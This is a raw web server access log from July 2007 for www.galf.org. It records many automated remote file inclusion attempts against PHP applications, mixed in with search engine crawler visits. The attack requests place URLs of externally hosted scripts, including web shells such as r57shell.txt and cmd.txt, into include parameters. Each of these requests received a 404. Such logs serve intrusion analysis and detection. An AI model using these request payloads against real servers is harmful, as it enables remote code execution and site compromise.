72.9.225.125 - - [15/Jul/2007:17:00:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://freebsd.netfast.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.9.225.125 - - [15/Jul/2007:17:00:45 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://freebsd.netfast.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.66.7.125 - - [15/Jul/2007:17:03:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://freebsd.netfast.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.66.7.125 - - [15/Jul/2007:17:03:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://freebsd.netfast.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.29.77.80 - - [15/Jul/2007:17:04:46 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [15/Jul/2007:17:05:39 -0700] "GET /logs/access.log/index.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [15/Jul/2007:17:05:39 -0700] "GET /index.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.219.187 - - [15/Jul/2007:17:05:39 -0700] "GET /logs/index.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.13.23.98 - - [15/Jul/2007:17:06:15 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://fake.totalh.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:08:09 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:08:10 -0700] "GET /middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:08:10 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.52.66 - - [15/Jul/2007:17:08:21 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.223.101.177 - - [15/Jul/2007:17:10:25 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.223.101.177 - - [15/Jul/2007:17:12:14 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:13:43 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:13:44 -0700] "GET /middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.17.159 - - [15/Jul/2007:17:15:10 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:15:35 -0700] "GET /logs/access.log/middle.php?page=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:15:35 -0700] "GET /middle.php?page=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.158.202.29 - - [15/Jul/2007:17:15:36 -0700] "GET /logs/middle.php?page=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:17:19:03 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
70.84.199.58 - - [15/Jul/2007:17:19:03 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.227.218.146 - - [15/Jul/2007:17:19:34 -0700] "GET //sohoadmin/program/includes/login.php?_SESSION[docroot_path]=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.81.189 - - [15/Jul/2007:17:21:06 -0700] "GET //sohoadmin/program/includes/login.php?_SESSION[docroot_path]=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.81.189 - - [15/Jul/2007:17:21:06 -0700] "GET //program/includes/login.php?_SESSION[docroot_path]=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:21:12 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:21:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.227.218.146 - - [15/Jul/2007:17:22:41 -0700] "GET /index.php?option=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.227.217.210 - - [15/Jul/2007:17:22:53 -0700] "GET /index.php?option=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
216.227.218.146 - - [15/Jul/2007:17:24:17 -0700] "GET /index2.php?topic=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
89.108.67.99 - - [15/Jul/2007:17:25:51 -0700] "GET /logs/index2.php?url_page=http://www.francisconi.com/marisa/cadastro/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.99 - - [15/Jul/2007:17:25:51 -0700] "GET /index2.php?url_page=http://www.francisconi.com/marisa/cadastro/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.227.217.210 - - [15/Jul/2007:17:26:12 -0700] "GET /index2.php?page=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.111.52.134 - - [15/Jul/2007:17:26:58 -0700] "GET /logs/announcements.php?phpraid_dir=http://pyrosoft.cable.nu/nabil? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.97.201.108 - - [15/Jul/2007:17:26:58 -0700] "GET /index2.php?topic=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.111.52.134 - - [15/Jul/2007:17:26:58 -0700] "GET /announcements.php?phpraid_dir=http://pyrosoft.cable.nu/nabil? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.111.52.134 - - [15/Jul/2007:17:27:06 -0700] "GET /logs/announcements.php?phpraid_dir=ttp://www.projectskyline.com/phplist/r57shell.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.111.52.134 - - [15/Jul/2007:17:27:07 -0700] "GET /announcements.php?phpraid_dir=ttp://www.projectskyline.com/phplist/r57shell.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.111.52.134 - - [15/Jul/2007:17:27:50 -0700] "GET /logs/index.php?go=ttp://www.projectskyline.com/phplist/r57shell.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.81.189 - - [15/Jul/2007:17:27:50 -0700] "GET /index.php?option=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.111.52.134 - - [15/Jul/2007:17:27:51 -0700] "GET /index.php?go=ttp://www.projectskyline.com/phplist/r57shell.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79"
218.111.52.134 - - [15/Jul/2007:17:27:53 -0700] "GET /logs/index.php?go=http://pyrosoft.cable.nu/nabil? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.111.52.134 - - [15/Jul/2007:17:27:54 -0700] "GET /index.php?go=http://pyrosoft.cable.nu/nabil? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.81.189 - - [15/Jul/2007:17:28:42 -0700] "GET /index2.php?topic=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.77.80 - - [15/Jul/2007:17:28:43 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:17:29:04 -0700] "GET /logs/index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:17:29:04 -0700] "GET /index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:17:29:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:17:29:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.97.201.108 - - [15/Jul/2007:17:29:27 -0700] "GET /index2.php?page=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.81.189 - - [15/Jul/2007:17:29:28 -0700] "GET /index2.php?page=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:29:38 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:29:38 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:30:07 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:30:08 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
210.200.180.227 - - [15/Jul/2007:17:30:19 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:30:21 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:30:23 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:30:24 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:30:27 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
210.200.180.227 - - [15/Jul/2007:17:30:27 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.227.217.210 - - [15/Jul/2007:17:31:58 -0700] "GET /index.php?theme=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.227.218.146 - - [15/Jul/2007:17:32:03 -0700] "GET /index.php?theme=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.81.189 - - [15/Jul/2007:17:33:09 -0700] "GET /index.php?theme=http://www.dnsyndicate.com/media/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:34:48 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:34:48 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:34:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.158.202.29 - - [15/Jul/2007:17:34:53 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:36:01 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:36:02 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
210.200.180.227 - - [15/Jul/2007:17:36:08 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:36:08 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
70.84.199.58 - - [15/Jul/2007:17:36:23 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:17:36:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.66.7.125 - - [15/Jul/2007:17:37:02 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://freebsd.netfast.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.19.79 - - [15/Jul/2007:17:39:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.28.212 - - [15/Jul/2007:17:39:15 -0700] "GET /cendoc/?D=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.86.37.2 - - [15/Jul/2007:17:39:39 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
75.126.55.114 - - [15/Jul/2007:17:40:42 -0700] "GET /logs/index.php?go=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.55.114 - - [15/Jul/2007:17:40:42 -0700] "GET /index.php?go=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.152.199 - - [15/Jul/2007:17:42:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.betkaschpitz.com/site/plugins/p119_flashgallery/images/.secure/bypass.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.152.199 - - [15/Jul/2007:17:43:57 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.betkaschpitz.com/site/plugins/p119_flashgallery/images/.secure/bypass.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.110.209.227 - - [15/Jul/2007:17:44:09 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.betkaschpitz.com/site/plugins/p119_flashgallery/images/.secure/bypass.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:44:20 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:44:20 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
128.121.79.253 - - [15/Jul/2007:17:44:49 -0700] "GET /logs/index.php?go=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.79.253 - - [15/Jul/2007:17:44:49 -0700] "GET /index.php?go=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.9.225.125 - - [15/Jul/2007:17:45:29 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://freebsd.netfast.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.110.209.227 - - [15/Jul/2007:17:45:42 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.betkaschpitz.com/site/plugins/p119_flashgallery/images/.secure/bypass.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:47:47 -0700] "GET /logs/index.php?file=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:47:51 -0700] "GET /index.php?file=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
70.86.37.2 - - [15/Jul/2007:17:48:04 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.37.2 - - [15/Jul/2007:17:48:04 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.19.184 - - [15/Jul/2007:17:48:57 -0700] "GET /logs/template.php?pagina=http://www.afghanet.com/jokes/languages/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.19.184 - - [15/Jul/2007:17:48:57 -0700] "GET /template.php?pagina=http://www.afghanet.com/jokes/languages/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:50:01 -0700] "GET /logs/index.php?p=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [15/Jul/2007:17:50:02 -0700] "GET /index.php?p=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.6.86.208 - - [15/Jul/2007:17:51:01 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
122.152.140.111 - - [15/Jul/2007:17:51:31 -0700] "GET / HTTP/1.1" 200 1048 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.galf.org"
66.55.132.33 - - [15/Jul/2007:17:54:34 -0700] "GET /!scanhttp://tiagow.us/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:55:15 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.55.114 - - [15/Jul/2007:17:55:55 -0700] "GET /logs/index.php?go=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.55.114 - - [15/Jul/2007:17:55:55 -0700] "GET /index.php?go=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [15/Jul/2007:17:56:07 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.86.213 - - [15/Jul/2007:17:56:25 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
128.121.79.253 - - [15/Jul/2007:17:57:49 -0700] "GET /logs/index.php?go=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.79.253 - - [15/Jul/2007:17:57:49 -0700] "GET /index.php?go=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.86.166 - - [15/Jul/2007:18:05:28 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.87.13 - - [15/Jul/2007:18:19:24 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.97.64.32 - - [15/Jul/2007:18:31:34 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://educarbien.es/modules/tinycontent/admin/spaw/config/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:18:33:13 -0700] "GET /logs/announcements.php?phpraid_dir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:18:33:13 -0700] "GET /announcements.php?phpraid_dir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.17.237 - - [15/Jul/2007:18:33:25 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.68.221 - - [15/Jul/2007:18:34:45 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.19.190.150 - - [15/Jul/2007:18:36:38 -0700] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:18:36:39 -0700] "GET //sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.152.199 - - [15/Jul/2007:18:40:25 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.betkaschpitz.com/site/plugins/p119_flashgallery/images/.secure/bypass.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.110.209.227 - - [15/Jul/2007:18:42:10 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.betkaschpitz.com/site/plugins/p119_flashgallery/images/.secure/bypass.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
213.218.143.52 - - [15/Jul/2007:18:42:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:18:42:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.16.50 - - [15/Jul/2007:18:45:22 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.16.50 - - [15/Jul/2007:18:45:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.19.16.50 - - [15/Jul/2007:18:45:22 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.152.199 - - [15/Jul/2007:18:47:56 -0700] "GET /modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.betkaschpitz.com/site/plugins/p119_flashgallery/images/.secure/bypass.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.92.8.3 - - [15/Jul/2007:18:51:06 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.92.8.3 - - [15/Jul/2007:18:51:07 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [15/Jul/2007:18:55:08 -0700] "GET /logs/index.php?go=http://www.francisconi.com/marisa/cadastro/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [15/Jul/2007:18:55:08 -0700] "GET /index.php?go=http://www.francisconi.com/marisa/cadastro/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [15/Jul/2007:18:56:16 -0700] "GET /logs/index.php?go=http://www.francisconi.com/marisa/cadastro/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
